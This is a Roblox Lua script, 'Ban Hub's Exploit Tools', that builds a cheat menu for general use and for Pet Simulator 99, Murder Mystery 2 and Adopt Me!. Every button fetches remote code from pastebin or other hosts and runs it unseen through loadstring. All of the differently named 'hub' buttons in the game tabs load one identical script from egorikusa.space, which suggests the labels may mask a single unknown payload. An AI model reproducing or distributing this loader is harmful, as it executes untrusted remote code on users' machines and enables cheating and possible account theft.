local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/thanhdat4461/OrionMoblie/main/source')))()
local Window = OrionLib:MakeWindow({Name = "Ban Hub's Exploit Tools", HidePremium = false, SaveConfig = true, IntroText = "Ban Hub's Exploit Tools Presents" })
local MainTab = Window:MakeTab({
    Name = "Home",
    Icon = "rbxassetid://4483345998",
    PremiumOnly = false
})

MainTab:AddButton({
    Name = "Fly GUI",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet('https://pastebin.com/raw/YSL3xKYU'))()
    end   
})

MainTab:AddButton({
    Name = "Teleport GUI",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet(("https://pastebin.com/raw/YNVbeqPy")))()
    end   
})

MainTab:AddButton({
    Name = "Speed GUI",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet(("https://pastebin.com/raw/QXugUKCE")))()
    end   
})

MainTab:AddButton({
    Name = "Infinite Jump",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet(("https://pastebin.com/raw/2NBDvQ73")))()
    end   
})

MainTab:AddButton({
    Name = "Highlight ESP",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet('https://pastebin.com/raw/7K1Jhmck', true))()
    end   
})

MainTab:AddButton({
    Name = "Keyboard for Mobile",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet('https://pastebin.com/raw/cVZ9teYu', true))()
    end   
})

MainTab:AddButton({
    Name = "Anti-AFK",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet('https://pastebin.com/raw/EkRTvJC4', true))()
    end   
})

MainTab:AddButton({
    Name = "Noclip",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet('https://pastebin.com/raw/8fxrxv9X', true))()
    end   
})

MainTab:AddButton({
    Name = "Infiniteyield",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet('https://pastebin.com/raw/M6uvCBjR', true))()
    end   
})

MainTab:AddButton({
    Name = "View Chatlogs",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet('https://pastebin.com/raw/stggPUBM', true))()
    end   
})

local Main2Tab = Window:MakeTab({
    Name = "Pet Simulator 99",
    Icon = "rbxassetid://16496411242",
    PremiumOnly = false
})

Main2Tab:AddButton({
    Name = "REDz HUB",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main2Tab:AddButton({
    Name = "ZapHub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main2Tab:AddButton({
    Name = "V.G Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main2Tab:AddButton({
    Name = "GanjaHub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main2Tab:AddButton({
    Name = "Speed Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main2Tab:AddButton({
    Name = "HEKTOR HUB",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main2Tab:AddButton({
    Name = "AutoFarm",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

local Main3Tab = Window:MakeTab({
    Name = "Murder Mystery 2",
    Icon = "rbxassetid://16496376843",
    PremiumOnly = false
})

Main3Tab:AddButton({
    Name = "Nexus Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main3Tab:AddButton({
    Name = "XHub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main3Tab:AddButton({
    Name = "Prosto Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main3Tab:AddButton({
    Name = "Eclipse Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main3Tab:AddButton({
    Name = "Kidachi Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main3Tab:AddButton({
    Name = "Tbao Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})
   
Main3Tab:AddButton({
    Name = "AutoFarm",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

local Main4Tab = Window:MakeTab({
    Name = "Adopt Me!",
    Icon = "rbxassetid://16496376843",
    PremiumOnly = false
})

Main4Tab:AddButton({
    Name = "Prodigy X Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main4Tab:AddButton({
    Name = "Ice Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main4Tab:AddButton({
    Name = "REDz HUB",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main4Tab:AddButton({
    Name = "V.G Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main4Tab:AddButton({
    Name = "Eclipse Hub",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

Main4Tab:AddButton({
    Name = "AutoFarm",
    Callback = function()
        print("Button pressed")
        loadstring(game:HttpGet("https://egorikusa.space/e9cddcdf2b6a65844d096e98.lua", true))()
    end   
})

OrionLib:MakeNotification({
    Name = "Thanks you choosing us!",
    Content = "Like and Subscribe to the Ban Hub Channel!.",
    Image = "rbxassetid://4483345998",
    Time = 10
})
